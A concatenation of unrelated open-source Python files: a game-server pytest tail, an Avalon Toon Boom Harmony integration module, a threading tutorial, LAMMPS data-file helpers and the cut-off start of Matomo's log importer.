# Check that server has 10 clients connected
assert len(SERVER.Clients) == 10
# Disconnect 2 Clients
ClientInstances[12].Disconnect()
ClientInstances[13].Disconnect()
# Decrement server capacity
SERVER.MaxConcurrentClients -= 2
time.sleep(0.1)
assert SERVER.MaxConcurrentClients == 8
time.sleep(0.1)
assert len(SERVER.Clients) == 8
# Disconnect all clients
for client in ClientInstances:
client.Disconnect()
# Final Sleep to allow disconnections to finalize
time.sleep(0.1)
@pytest.mark.parametrize('NoClients', [8])
def test__concludePlayerGames(ClientInstances, NoClients):
clean_server()
order = [0, 3, 5, 2, 1, 4, 7, 6]
wins = dict(zip(order, range(len(order))))
for client in ClientInstances:
client.ConnectToServer(HOST, PORT)
clients = [client for client in SERVER.Clients]
SERVER.StartGame()
for idx in order:
ClientInstances[idx].Disconnect()
for idx, client in enumerate(clients):
assert client.PlayerInfo.GamesPlayed == len(order) - 1
assert client.PlayerInfo.NumberOfWins == wins[idx]
@pytest.mark.parametrize('NoClients', [8])
def test_join_server_after_tournament(ClientInstances, NoClients):
clean_server()
for client in ClientInstances[:-1]:
client.ConnectToServer(HOST, PORT)
SERVER.StartGame()
assert ClientInstances[-1].ConnectToServer(HOST, PORT) == -1
for client in ClientInstances[:-1]:
client.Disconnect()
|
lib.py
|
import subprocess
import threading
import os
import random
import zipfile
import sys
import importlib
import queue
import shutil
import logging
import contextlib
import json
import signal
import time
from .server import Server
from ..vendor.Qt import QtWidgets
from ..tools import workfiles
self = sys.modules[__name__]
self.server = None
self.pid = None
self.application_path = None
self.callback_queue = None
self.workfile_path = None
self.port = None
# Setup logging.
self.log = logging.getLogger(__name__)
self.log.setLevel(logging.DEBUG)
def execute_in_main_thread(func_to_call_from_main_thread):
self.callback_queue.put(func_to_call_from_main_thread)
def main_thread_listen():
callback = self.callback_queue.get()
callback()
def launch(application_path):
"""Setup for Harmony launch.
Launches Harmony and the server, then starts listening on the main thread
for callbacks from the server. This is to have Qt applications run in the
main thread.
"""
from avalon import api, harmony
api.install(harmony)
self.port = random.randrange(5000, 6000)
os.environ["AVALON_HARMONY_PORT"] = str(self.port)
self.application_path = application_path
# Launch Harmony.
os.environ["TOONBOOM_GLOBAL_SCRIPT_LOCATION"] = os.path.dirname(__file__)
if os.environ.get("AVALON_HARMONY_WORKFILES_ON_LAUNCH", False):
workfiles.show(save=False)
# No launch through Workfiles happened.
if not self.workfile_path:
zip_file = os.path.join(os.path.dirname(__file__), "temp.zip")
launch_zip_file(zip_file)
self.callback_queue = queue.Queue()
while True:
main_thread_listen()
def get_local_harmony_path(filepath):
"""From the provided path get the equivalent local Harmony path."""
basename = os.path.splitext(os.path.basename(filepath))[0]
harmony_path = os.path.join(os.path.expanduser("~"), ".avalon", "harmony")
return os.path.join(harmony_path, basename)
def launch_zip_file(filepath):
"""Launch a Harmony application instance with the provided zip file."""
print("Localizing {}".format(filepath))
temp_path = get_local_harmony_path(filepath)
scene_path = os.path.join(
temp_path, os.path.basename(temp_path) + ".xstage"
)
unzip = False
if os.path.exists(scene_path):
# Check remote scene is newer than local.
if os.path.getmtime(scene_path) < os.path.getmtime(filepath):
shutil.rmtree(temp_path)
unzip = True
else:
unzip = True
if unzip:
with zipfile.ZipFile(filepath, "r") as zip_ref:
zip_ref.extractall(temp_path)
# Close existing scene.
if self.pid:
os.kill(self.pid, signal.SIGTERM)
# Stop server.
if self.server:
self.server.stop()
# Launch Avalon server.
self.server = Server(self.port)
thread = threading.Thread(target=self.server.start)
thread.deamon = True
thread.start()
# Save workfile path for later.
self.workfile_path = filepath
print("Launching {}".format(scene_path))
process = subprocess.Popen([self.application_path, scene_path])
self.pid = process.pid
def on_file_changed(path, threaded=True):
"""Threaded zipping and move of the project directory.
This method is called when the `.xstage` file is changed.
"""
self.log.debug("File changed: " + path)
if self.workfile_path is None:
return
if threaded:
thread = threading.Thread(
target=zip_and_move,
args=(os.path.dirname(path), self.workfile_path)
)
thread.start()
else:
zip_and_move(os.path.dirname(path), self.workfile_path)
def zip_and_move(source, destination):
"""Zip a directory and move to `destination`
Args:
- source (str): Directory to zip and move to destination.
- destination (str): Destination file path to zip file.
"""
os.chdir(os.path.dirname(source))
shutil.make_archive(os.path.basename(source), "zip", source)
shutil.move(os.path.basename(source) + ".zip", destination)
self.log.debug("Saved \"{}\" to \"{}\"".format(source, destination))
def show(module_name):
"""Call show on "module_name".
This allows to make a QApplication ahead of time and always "exec_" to
prevent crashing.
Args:
module_name (str): Name of module to call "show" on.
"""
# Requests often get doubled up when showing tools, so we wait a second for
# requests to be received properly.
time.sleep(1)
# Need to have an existing QApplication.
app = QtWidgets.QApplication.instance()
if not app:
app = QtWidgets.QApplication(sys.argv)
# Import and show tool.
module = importlib.import_module(module_name)
if "loader" in module_name:
module.show(use_context=True)
else:
module.show()
# QApplication needs to always execute.
if "publish" in module_name:
return
app.exec_()
def get_scene_data():
func = """function func(args)
{
var metadata = scene.metadata("avalon");
if (metadata){
return JSON.parse(metadata.value);
}else {
return {};
}
}
func
"""
try:
return self.send({"function": func})["result"]
except json.decoder.JSONDecodeError:
# Means no sceen metadata has been made before.
return {}
except KeyError:
# Means no existing scene metadata has been made.
return {}
def set_scene_data(data):
# Write scene data.
func = """function func(args)
{
scene.setMetadata({
"name" : "avalon",
"type" : "string",
"creator" : "Avalon",
"version" : "1.0",
"value" : JSON.stringify(args[0])
});
}
func
"""
self.send({"function": func, "args": [data]})
def read(node_id):
"""Read object metadata in to a dictionary.
Args:
node_id (str): Path to node or id of object.
Returns:
dict
"""
scene_data = get_scene_data()
if node_id in get_scene_data():
return scene_data[node_id]
return {}
def remove(node_id):
data = get_scene_data()
del data[node_id]
set_scene_data(data)
def imprint(node_id, data, remove=False):
"""Write `data` to the `node` as json.
Arguments:
node_id (str): Path to node or id of object.
data (dict): Dictionary of key/value pairs.
remove (bool): Removes the data from the scene.
Example:
>>> from avalon.harmony import lib
>>> node = "Top/Display"
>>> data = {"str": "someting", "int": 1, "float": 0.32, "bool": True}
>>> lib.imprint(layer, data)
"""
scene_data = get_scene_data()
if node_id in scene_data:
scene_data[node_id].update(data)
else:
scene_data[node_id] = data
set_scene_data(scene_data)
@contextlib.contextmanager
def maintained_selection():
"""Maintain selection during context."""
func = """function get_selection_nodes()
{
var selection_length = selection.numberOfNodesSelected();
var selected_nodes = [];
for (var i = 0 ; i < selection_length; i++)
{
selected_nodes.push(selection.selectedNode(i));
}
return selected_nodes
}
get_selection_nodes
"""
selected_nodes = self.send({"function": func})["result"]
func = """function select_nodes(node_paths)
{
selection.clearSelection();
for (var i = 0 ; i < node_paths.length; i++)
{
selection.addNodeToSelection(node_paths[i]);
}
}
select_nodes
"""
try:
yield selected_nodes
finally:
selected_nodes = self.send(
{"function": func, "args": selected_nodes}
)
def send(request):
"""Public method for sending requests to Harmony."""
return self.server.send(request)
@contextlib.contextmanager
def maintained_nodes_state(nodes):
"""Maintain nodes states during context."""
# Collect current state.
states = []
for node in nodes:
states.append(
self.send(
{"function": "node.getEnable", "args": [node]}
)["result"]
)
# Disable all nodes.
func = """function func(nodes)
{
for (var i = 0 ; i < nodes.length; i++)
{
node.setEnable(nodes[i], false);
}
}
func
"""
self.send({"function": func, "args": [nodes]})
# Restore state after yield.
func = """function func(args)
{
var nodes = args[0];
var states = args[1];
for (var i = 0 ; i < nodes.length; i++)
{
node.setEnable(nodes[i], states[i]);
}
}
func
"""
try:
yield
finally:
self.send({"function": func, "args": [nodes, states]})
def save_scene():
"""Saves the Harmony scene safely.
The built-in (to Avalon) background zip and moving of the Harmony scene
folder, interfers with server/client communication by sending two requests
at the same time. This only happens when sending "scene.saveAll()". This
method prevents this double request and safely saves the scene.
"""
# Need to turn off the backgound watcher else the communication with
# the server gets spammed with two requests at the same time.
func = """function func()
{
var app = QCoreApplication.instance();
app.avalon_on_file_changed = false;
scene.saveAll();
return (
scene.currentProjectPath() + "/" +
scene.currentVersionName() + ".xstage"
);
}
func
"""
scene_path = self.send({"function": func})["result"]
# Manually update the remote file.
self.on_file_changed(scene_path, threaded=False)
# Re-enable the background watcher.
func = """function func()
{
var app = QCoreApplication.instance();
app.avalon_on_file_changed = true;
}
func
"""
self.send({"function": func})
def save_scene_as(filepath):
"""Save Harmony scene as `filepath`."""
scene_dir = os.path.dirname(filepath)
destination = os.path.join(
os.path.dirname(self.workfile_path),
os.path.splitext(os.path.basename(filepath))[0] + ".zip"
)
if os.path.exists(scene_dir):
shutil.rmtree(scene_dir)
send(
{"function": "scene.saveAs", "args": [scene_dir]}
)["result"]
zip_and_move(scene_dir, destination)
self.workfile_path = destination
func = """function add_path(path)
{
var app = QCoreApplication.instance();
app.watcher.addPath(path);
}
add_path
"""
send(
{"function": func, "args": [filepath]}
)
def find_node_by_name(name, node_type):
nodes = send(
{"function": "node.getNodes", "args": [[node_type]]}
)["result"]
for node in nodes:
node_name = node.split("/")[-1]
if name == node_name:
return node
return None
|
duoxiancheng01.py
|
# 进程: 执行单位,每一个进程至少有一个线程
# 线程: 资源单位
from threading import Thread
def func(name):
for i in range(1000):
print('func', name)
def sum():
for i in range(1000):
print('sum', i)
#第二种
class MyThead(Thread):
def run(self): #固定的方法
for i in range(1000):
print('子线程', i)
if __name__ == "__main__":
# 第一种 创建线程
t = Thread(target=func, args=("周杰伦", )) #穿参必须是元组
t.start()
#
# t2 = Thread(target=sum)
# t2.start()
#
# 第二种
# myTh = MyThead()
# myTh.start()
for i in range(1000):
print('main', i)
|
lmp.py
|
"""
Functions for manipulating LAMMPS files.
"""
import math
import os
from subprocess import Popen, PIPE # call,
from time import strftime
from .hublib import check_nanohub
LAMMPS_EXEC = os.environ.get("LAMMPS_EXEC")
if LAMMPS_EXEC is None:
LOADEDMODULES = os.environ.get("LOADEDMODULES")
if LOADEDMODULES and ("lammps/31Mar17" in LOADEDMODULES):
LAMMPS_EXEC = "lmp"
elif os.environ["HOME"] == "/Users/shentongtong":
LAMMPS_EXEC = "/Users/shentongtong/Dropbox/softwares/lammps-3Mar20/src/lmp_mpi"
verbose = False
def check_lmps_exec():
"""Check lammps executable exists"""
if LAMMPS_EXEC is None:
print("you must set environment variable LAMMPS_EXEC")
return False
else:
try:
stdout, stderr = Popen(
[LAMMPS_EXEC, "-e", "both", "-l", "none"],
stdin=PIPE,
stdout=PIPE,
stderr=PIPE,
).communicate()
if verbose:
print("using %s LAMMPS machine" % LAMMPS_EXEC)
return True
except OSError:
print("LAMMPS is not configured properly for one reason or another")
return False
def read_data(data_file):
"""Read information from a LAMMPS data file
Parameters
----------
data_file : str
The path of the data file to read
Returns
-------
data_dir : dict
Data from the LAMMPS data file as a dictionary.
"""
# This function would be easier to unit test if it took in a string instead of a file.
data_dir = {}
# box = {}
# masses = {}
with open(data_file, "r") as data_src:
skip_line = 1
feature = ""
for line in data_src.readlines():
if skip_line:
skip_line = 0
continue
# ln will have 0 length if line is comment.
ln = line.split("#")[0].split()
if ln:
if (
len(ln) > 1
and ln[0].isdigit()
and (not ln[1].isdigit())
and (not feature)
):
# I think you are just trying to cast as a number here? Is safer to try casting as float.
data_dir[" ".join(ln[1:])] = float(ln[0])
if len(ln) == 4 and ln[2][1:] == "lo" and ln[3][1:] == "hi":
data_dir[ln[2]] = float(ln[0])
data_dir[ln[3]] = float(ln[1])
if not (ln[0][0].isdigit() or ln[0][0] == "-"):
feature = " ".join(ln)
data_dir[feature] = {}
if feature and (ln[0][0].isdigit() or ln[0][0] == "-"):
data_dir[feature][eval(ln[0])] = [eval(i) for i in ln[1:]]
return data_dir
def write_lmp_ifile(
lmp_file_location="LAMMPSinputfile.txt",
ffield="Dreiding",
potential_headfile="",
datafile="",
potentialfile="",
lammps_min=False,
lammps_min_levels=1,
):
"""Write a LAMMPS input file given a file location and datafile.
Parameters
----------
lmp_file_location : str (optional)
The path of LAMMPS input file to output.
ffield : str (optional)
Force field style to generate potential style definitions for LAMMPS input file.
potential_headfile : str (optional)
The path of part of the LAMMPS input file including potential style definitions.
datafile : str (optional)
The path of the LAMMPS data file to read.
potentialfile : str (optional)
The path of part of the LAMMPS input file including potential coefficients.
Returns
-------
None
"""
des = open(lmp_file_location, "w")
# des.write("newton on\n")
des.write("boundary p p p\n")
des.write("units real\n")
des.write("\n")
des.write("atom_style full\n")
des.write("dielectric 1.0\n")
if potential_headfile:
des.write("include %s\n" % potential_headfile)
else:
if ffield == "Dreiding":
des.write("special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("pair_style lj/cut 12.0\n")
des.write("bond_style harmonic\n")
des.write("angle_style harmonic\n")
des.write("dihedral_style harmonic\n")
des.write("improper_style harmonic\n")
elif ffield == "PCFF":
des.write("pair_style lj/class2/coul/long 9.5 9.5\n")
des.write("pair_modify tail yes \n")
des.write("bond_style class2\n")
des.write("angle_style class2\n")
des.write("dihedral_style class2\n")
des.write("improper_style class2\n")
des.write("kspace_style ewald 0.0001\n")
des.write("\n")
else:
raise Exception(
"Unknown force field style to generate potential style definitions for LAMMPS input file.\nPlease \
include a file for LAMMPS potential style definitions and set the path to potential_headfile \
parameter"
)
if datafile:
des.write("read_data %s\n" % datafile)
des.write("neighbor 0.3 bin\n")
des.write(
"thermo_style custom step etotal ke temp pe ebond eangle edihed eimp evdwl ecoul elong press pxx pyy pzz"
+ " pxy pxz pyz lx ly lz vol density\n"
)
des.write("thermo 10\n")
des.write("thermo_modify flush yes\n")
des.write("\n")
if ffield == "Dreiding":
des.write("pair_style buck/coul/long 12.0 12.0\n")
des.write("kspace_style pppm 1e-4\n")
if potentialfile:
des.write("include %s\n" % potentialfile)
des.write("\n")
des.write("fix 1 all nve\n")
des.write("run 0\n")
des.write("unfix 1\n")
des.write("\n")
des.write("# Dump minimized system\n")
des.write("dump 1 all atom 1 min.dump\n")
des.write("dump_modify 1 image yes scale no\n")
des.write("\n")
des.write("# Minimization parameters\n")
des.write("minimize 1.0e-9 1.0e-9 5000 100000\n")
des.write("\n")
des.write("undump 1\n")
des.write("write_data min.data\n")
des.write("\n")
des.write("# MD parameters\n")
des.write("run_style respa 3 2 2 bond 1 pair 2 kspace 3\n")
des.write("reset_timestep 0\n")
des.write("timestep 4\n")
des.write("dump 1 all atom 100 md.dump\n")
des.write("dump_modify 1 image yes scale no\n")
des.write("fix 1 all nvt temp 300.0 300.0 400.0\n")
des.write("run 1000\n")
des.write("write_restart restart.lammps\n")
des.write("write_data md.data\n")
des.write("\n")
# des.write("compute graincm all com\n")
# des.write("variable M equal mass(all)\n")
# des.write("variable maxcx equal bound(all,xmax)\n")
# des.write("variable mincx equal bound(all,xmin)\n")
# des.write("variable maxcy equal bound(all,ymax)\n")
# des.write("variable mincy equal bound(all,ymin)\n")
# des.write("variable maxcz equal bound(all,zmax)\n")
# des.write("variable mincz equal bound(all,zmin)\n")
# des.write("\n")
# des.write(
# "fix 1 all ave/time 1 1 1 c_graincm[1] c_graincm[2] c_graincm[3] v_maxcx v_mincx v_maxcy v_mincy
# v_maxcz v_mincz v_M file tmp.out\n"
# )
# Here is the tmp.out output after running LAMMPS
# des.write("run 0\n")
# des.write("\n")
des.close()
def call_lammps(lmp_input, np, nanohub=None, prefix="mpiexec", print_to_screen=False):
"""pysimm.lmps.call_lammps
Wrapper to call LAMMPS using executable name defined in pysimm.lmps module.
Args:
simulation: :class:`~pysimm.lmps.Simulation` object reference
np: number of threads to use
nanohub: dictionary containing nanohub resource information default=None
prefix: prefix for running LAMMPS (i.e. - mpiexec)
Returns:
None
"""
# log_name = "out"
if nanohub:
# with open('temp.in', 'w') as f:
# f.write(simulation.input)
# if simulation.name:
# print('%s: sending %s simulation to computer cluster at nanoHUB' % (strftime('%H:%M:%S'), \
# simulation.name))
# else:
# print('%s: sending simulation to computer cluster at nanoHUB' % strftime('%H:%M:%S'))
# sys.stdout.flush()
# cmd = ('submit -n %s -w %s -i temp.lmps -i temp.in '
# 'lammps-09Dec14-parallel -e both -l none -i temp.in'
# % (nanohub.get('cores'), nanohub.get('walltime')))
# cmd = shlex.split(cmd)
# exit_status, stdo, stde = RapptureExec(cmd)
return_code = os.system("lmp_serial < %s > out" % lmp_input)
return return_code
else:
# if simulation.name:
# print('%s: starting %s LAMMPS simulation'
# % (strftime('%H:%M:%S'), simulation.name))
# else:
# print('%s: starting LAMMPS simulation'
# % strftime('%H:%M:%S'))
print("%s: starting LAMMPS simulation" % strftime("%H:%M:%S"))
if np:
p = Popen(
[prefix, "-np", str(np), LAMMPS_EXEC, "-e", "both"],
stdin=PIPE,
stdout=PIPE,
stderr=PIPE,
)
else:
p = Popen([LAMMPS_EXEC, "-e", "both"], stdin=PIPE, stdout=PIPE, stderr=PIPE)
# simulation.write_input()
# if simulation.debug:
# print(simulation.input)
# warning_print('debug setting involves streaming output from LAMMPS process and can degrade performance')
# warning_print('only use debug for debugging purposes, use print_to_screen to collect stdout after \
# process finishes')
# p.stdin.write(simulation.input)
# q = Queue()
# t = Thread(target=enqueue_output, args=(p.stdout, q))
# t.daemon = True
# t.start()
# while t.isAlive() or not q.empty():
# try:
# line = q.get_nowait()
# except Empty:
# pass
# else:
# if simulation.debug:
# sys.stdout.write(line)
# sys.stdout.flush()
# else:
simulation_input = ""
with open(lmp_input, "r") as input_text:
simulation_input = input_text.read()
stdo, stde = p.communicate(simulation_input.encode("utf-8"))
if print_to_screen:
print(stdo)
print(stde)
if stde:
return 1
else:
return 0
# simulation.system.read_lammps_dump('pysimm.dump.tmp')
# try:
# os.remove('temp.lmps')
# except OSError as e:
# print(str(e))
# if os.path.isfile('pysimm.qeq.tmp'):
# os.remove('pysimm.qeq.tmp')
# try:
# os.remove('pysimm.dump.tmp')
# if simulation.name:
# print('%s: %s simulation using LAMMPS successful'
# % (strftime('%H:%M:%S'), simulation.name))
# else:
# print('%s: simulation using LAMMPS successful'
# % (strftime('%H:%M:%S')))
# except OSError as e:
# if simulation.name:
# raise PysimmError('%s simulation using LAMMPS UNsuccessful' % simulation.name)
# else:
# raise PysimmError('simulation using LAMMPS UNsuccessful')
def run_lammps(lmp_input, np=None, nanohub=None, save_input=True, prefix="mpiexec"):
"""pysimm.lmps.Simulation.run
Begin LAMMPS simulation.
Args:
np: number of threads to use (serial by default) default=None
nanohub: dictionary containing nanohub resource information default=None
init: True to write initialization part of LAMMPS input script (set to False if using complete custom input)
save_input: True to save input as pysimm.sim.in
prefix: prefix for running LAMMPS (i.e. - mpiexec)
"""
try:
return_code = call_lammps(lmp_input, np, nanohub=check_nanohub(), prefix=prefix)
except OSError:
raise Exception("There was a problem calling LAMMPS with {}".format(prefix))
except: # noqa: E722
if check_lmps_exec():
raise Exception(
"There was a problem running LAMMPS. The process started but did not finish successfully. Check the \
log file, or rerun the simulation with debug=True to debug issue from LAMMPS output"
)
else:
raise Exception(
"There was a problem running LAMMPS. LAMMPS is not configured properly. Make sure the LAMMPS_EXEC \
environment variable is set to the correct LAMMPS executable path. The current path is set \
to:\n\n{}".format(
LAMMPS_EXEC
)
)
# os.system('%s < %s' % (lmp_location, lmp_file_location))
# os.system('cp log.lammps out')
# return_code = os.system('lmp_serial < ./bonds/bondcreate.in > out')
return return_code
def read_cell_sizes(data_file):
"""read_cell_sizes function provides a quick step to read the simulation box information"""
cell_sizes = {}
delta_cell = {}
with open(data_file) as f:
for line in f:
if line.endswith("xhi\n"):
values = line.rstrip().split()
lo = values[0]
hi = values[1]
ds = float(hi) - float(lo)
cell_sizes["x"] = [lo, hi, ds]
delta_cell["x"] = ds
elif line.endswith("yhi\n"):
values = line.rstrip().split()
lo = values[0]
hi = values[1]
ds = float(hi) - float(lo)
cell_sizes["y"] = [lo, hi, ds]
delta_cell["y"] = ds
elif line.endswith("zhi\n"):
values = line.rstrip().split()
lo = values[0]
hi = values[1]
ds = float(hi) - float(lo)
cell_sizes["z"] = [lo, hi, ds]
delta_cell["z"] = ds
break
return cell_sizes, delta_cell
def get_boundaries(direction):
"""
get_boundaries function gets the center of mass and the boundaris - the minimum and maximum x, y and z positions -
of a molecule or molecules from LAMMPS out put tmp.out
"""
boundaries = {}
com = {}
with open("tmp.out", "r") as infile:
r = infile.readline()
r = infile.readline() # noqa: F841
for line in infile:
print(line)
line = [float(x) for x in line.split()]
mass = line[10]
com["x"] = line[1]
com["y"] = line[2]
com["z"] = line[3]
boundaries["x"] = [line[4], line[5]]
boundaries["y"] = [line[6], line[7]]
boundaries["z"] = [line[8], line[9]]
# Get max radius
distance = []
coord = {}
# polymod = {}
for key, values in sorted(boundaries.items()):
if key == direction:
continue
res = sum(values) / 2.0
coord[key] = res
diff = abs(values[0] - res)
distance.append(diff)
# for v in values:
# distance.append(abs(v-com[key]))
radius = math.ceil(max(distance)) + 5
# print('Coordinates cylinder: ', coord, 'Radius distance :', radius)
return mass, com, boundaries, coord, radius
def write_data(data_dir, ofile, velocities=True, atom_only=False):
"""Write a LAMMPS data file
Parameters
----------
dir_data : dict
Dictionary storing data to form LAMMPS data file.
ofile : str
The path of LAMMPS data file to output.
velocities : bool (optional)
Decide ouput velocities information or not.
atom_only : bool (optional)
Decide output atoms information only or not.
Returns
-------
data_dir : dict
Data from the LAMMPS data file as a dictionary.
"""
des = open(ofile, "w")
des.write("LAMMPS data file via Tongtong\n")
des.write("\n")
if atom_only:
head_list = ["atom"]
main_list = ["Masses", "Atoms", "Velocities"]
else:
head_list = ["atom", "bond", "angle", "dihedral", "improper"]
main_list = [
"Masses",
"Pair Coeffs",
"Bond Coeffs",
"Angle Coeffs",
"Dihedral Coeffs",
"Improper Coeffs",
"Atoms",
"Velocities",
"Bonds",
"Angles",
"Dihedrals",
"Impropers",
]
for head in head_list:
if (head + "s") in data_dir:
des.write("%d %s\n" % (data_dir[head + "s"], (head + "s")))
des.write("%d %s\n" % (data_dir[head + " types"], (head + " types")))
des.write("\n")
for xyz in ["x", "y", "z"]:
des.write(
"%f %f %s %s\n"
% (data_dir[xyz + "lo"], data_dir[xyz + "hi"], (xyz + "lo"), (xyz + "hi"))
)
des.write("\n")
if not velocities:
main_list.remove("Velocities")
for key in main_list:
if key in data_dir and len(data_dir[key]):
des.write(key + (" # full\n" if key == "Atoms" else "\n"))
des.write("\n")
for i in data_dir[key]:
des.write(
str(i) + " " + " ".join(str(j) for j in data_dir[key][i]) + "\n"
)
des.write("\n")
des.close()
|
import_logs.py
|
#!/usr/bin/python
# vim: et sw=4 ts=4:
# -*- coding: utf-8 -*-
#
# Matomo - free/libre analytics platform
#
# @link https://matomo.org
# @license https://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later
# @version $Id$
#
# For more info see: https://matomo.org/log-analytics/ and https://matomo.org/docs/log-analytics-tool-how-to/
#
# Requires Python 2.6 or 2.7
#
import sys
if sys.version_info[0] != 2:
print('The log importer currently does not work with Python 3 (or higher)')
print('Please use Python 2.6 or 2.7')
sys.exit(1)
import base64
import bz2
import ConfigParser
import datetime
import fnmatch
import gzip
import hashlib
import httplib
import inspect
import itertools
import logging
import optparse
import os
import os.path
import Queue
import re
import ssl
import sys
import threading
import time
import urllib
import urllib2
import urlparse
import subprocess
import functools
import traceback
import socket
import textwrap
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
if sys.version_info < (2, 6):
print >> sys.stderr, 'simplejson (http://pypi.python.org/pypi/simplejson/) is required.'
sys.exit(1)
##
## Constants.
##
STATIC_EXTENSIONS = set((
'gif jpg jpeg png bmp ico svg svgz ttf otf eot woff woff2 class swf css js xml robots.txt webp'
).split())
DOWNLOAD_EXTENSIONS = set((
'7z aac arc arj asf asx avi bin csv deb dmg doc docx exe flac flv gz gzip hqx '
'ibooks jar json mpg mp2 mp3 mp4 mpeg mov movie msi msp odb odf odg odp '
'ods odt ogg ogv pdf phps ppt pptx qt qtm ra ram rar rpm rtf sea sit tar tbz '
'bz2 tbz tgz torrent txt wav webm wma wmv wpd xls xlsx xml xsd z zip '
'azw3 epub mobi apk'
).split())
# A good source is: http://phpbb-bots.blogspot.com/
# user agents must be lowercase
EXCLUDED_USER_AGENTS = (
'adsbot-google',
'ask jeeves',
'baidubot',
'bot-',
'bot/',
'ccooter/',
'crawl',
'curl',
'echoping',
'exabot',
'feed',
'googlebot',
'ia_archiver',
'java/',
'libwww',
'mediapartners-google',
'msnbot',
'netcraftsurvey',
'panopta',
'pingdom.com_bot_',
'robot',
'spider',
'surveybot',
'twiceler',
'voilabot',
'yahoo',
'yandex',
)
MATOMO_DEFAULT_MAX_ATTEMPTS = 3
MATOMO_DEFAULT_DELAY_AFTER_FAILURE = 10
DEFAULT_SOCKET_TIMEOUT = 300
MATOMO_EXPECTED_IMAGE = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='
)
##
## Formats.
##
class BaseFormatException(Exception): pass
class BaseFormat(object):
def __init__(self, name):
self.name = name
self.regex = None
self.date_format = '%d/%b/%Y:%H:%M:%S'
def check_format(self, file):
line = file.readline()
try:
file.seek(0)
except IOError:
pass
return self.check_format_line(line)
def check_format_line(self, line):
return False
class JsonFormat(BaseFormat):
def __init__(self, name):
super(JsonFormat, self).__init__(name)
self.json = None
self.date_format = '%Y-%m-%dT%H:%M:%S'
def check_format_line(self, line):
try:
self.json = json.loads(line)
return True
except:
return False
def match(self, line):
try:
# nginx outputs malformed JSON w/ hex escapes when confronted w/ non-UTF input. we have to
# workaround this by converting hex escapes in strings to unicode escapes. the conversion is naive,
# so it does not take into account the string's actual encoding (which we don't have access to).
line = line.replace('\\x', '\\u00')
self.json = json.loads(line)
return self
except:
self.json = None
return None
def get(self, key):
# Some ugly patchs ...
if key == 'generation_time_milli':
self.json[key] = int(float(self.json[key]) * 1000)
# Patch date format ISO 8601
elif key == 'date':
tz = self.json[key][19:]
self.json['timezone'] = tz.replace(':', '')
self.json[key] = self.json[key][:19]
try:
return self.json[key]
except KeyError:
raise BaseFormatException()
def get_all(self,):
return self.json
def remove_ignored_groups(self, groups):
for group in groups:
del self.json[group]
class RegexFormat(BaseFormat):
def __init__(self, name, regex, date_format=None):
super(RegexFormat, self).__init__(name)
if regex is not None:
self.regex = re.compile(regex)
if date_format is not None:
self.date_format = date_format
self.matched = None
def check_format_line(self, line):
return self.match(line)
def match(self,line):
if not self.regex:
return None
match_result = self.regex.match(line)
if match_result:
self.matched = match_result.groupdict()
else:
self.matched = None
return match_result
def get(self, key):
try:
return self.matched[key]
except KeyError:
raise BaseFormatException("Cannot find group '%s'." % key)
def get_all(self,):
return self.matched
def remove_ignored_groups(self, groups):
for group in groups:
del self.matched[group]
class W3cExtendedFormat(RegexFormat):
FIELDS_LINE_PREFIX = '#Fields: '
fields = {
'date': '(?P<date>\d+[-\d+]+',
'time': '[\d+:]+)[.\d]*?', # TODO should not assume date & time will be together not sure how to fix ATM.
'cs-uri-stem': '(?P<path>/\S*)',
'cs-uri-query': '(?P<query_string>\S*)',
'c-ip': '"?(?P<ip>[\w*.:-]*)"?',
'cs(User-Agent)': '(?P<user_agent>".*?"|\S*)',
'cs(Referer)': '(?P<referrer>\S+)',
'sc-status': '(?P<status>\d+)',
'sc-bytes': '(?P<length>\S+)',
'cs-host': '(?P<host>\S+)',
'cs-method': '(?P<method>\S+)',
'cs-username': '(?P<userid>\S+)',
'time-taken': '(?P<generation_time_secs>[.\d]+)'
}
def __init__(self):
super(W3cExtendedFormat, self).__init__('w3c_extended', None, '%Y-%m-%d %H:%M:%S')
def check_format(self, file):
self.create_regex(file)
# if we couldn't create a regex, this file does not follow the W3C extended log file format
if not self.regex:
try:
file.seek(0)
except IOError:
pass
return
first_line = file.readline()
try:
file.seek(0)
except IOError:
pass
return self.check_format_line(first_line)
def create_regex(self, file):
fields_line = None
if config.options.w3c_fields:
fields_line = config.options.w3c_fields
# collect all header lines up until the Fields: line
# if we're reading from stdin, we can't seek, so don't read any more than the Fields line
header_lines = []
while fields_line is None:
line = file.readline().strip()
if not line:
continue
if not line.startswith('#'):
break
if line.startswith(W3cExtendedFormat.FIELDS_LINE_PREFIX):
fields_line = line
else:
header_lines.append(line)
if not fields_line:
return
# store the header lines for a later check for IIS
self.header_lines = header_lines
# Parse the 'Fields: ' line to create the regex to use
full_regex = []
expected_fields = type(self).fields.copy() # turn custom field mapping into field => regex mapping
# if the --w3c-time-taken-millisecs option is used, make sure the time-taken field is interpreted as milliseconds
if config.options.w3c_time_taken_in_millisecs:
expected_fields['time-taken'] = '(?P<generation_time_milli>[\d.]+)'
for mapped_field_name, field_name in config.options.custom_w3c_fields.iteritems():
expected_fields[mapped_field_name] = expected_fields[field_name]
del expected_fields[field_name]
# add custom field regexes supplied through --w3c-field-regex option
for field_name, field_regex in config.options.w3c_field_regexes.iteritems():
expected_fields[field_name] = field_regex
# Skip the 'Fields: ' prefix.
fields_line = fields_line[9:].strip()
for field in re.split('\s+', fields_line):
try:
regex = expected_fields[field]
except KeyError:
regex = '(?:".*?"|\S+)'
full_regex.append(regex)
full_regex = '\s+'.join(full_regex)
logging.debug("Based on 'Fields:' line, computed regex to be %s", full_regex)
self.regex = re.compile(full_regex)
def check_for_iis_option(self):
if not config.options.w3c_time_taken_in_millisecs and self._is_time_taken_milli() and self._is_iis():
logging.info("WARNING: IIS log file being parsed without --w3c-time-taken-milli option. IIS"
" stores millisecond values in the time-taken field. If your logfile does this, the aforementioned"
" option must be used in order to get accurate generation times.")
def _is_iis(self):
return len([line for line in self.header_lines if 'internet information services' in line.lower() or 'iis' in line.lower()]) > 0
def _is_time_taken_milli(self):
return 'generation_time_milli' not in self.regex.pattern
class IisFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'time-taken': '(?P<generation_time_milli>[.\d]+)',
'sc-win32-status': '(?P<__win32_status>\S+)' # this group is useless for log importing, but capturing it
# will ensure we always select IIS for the format instead of
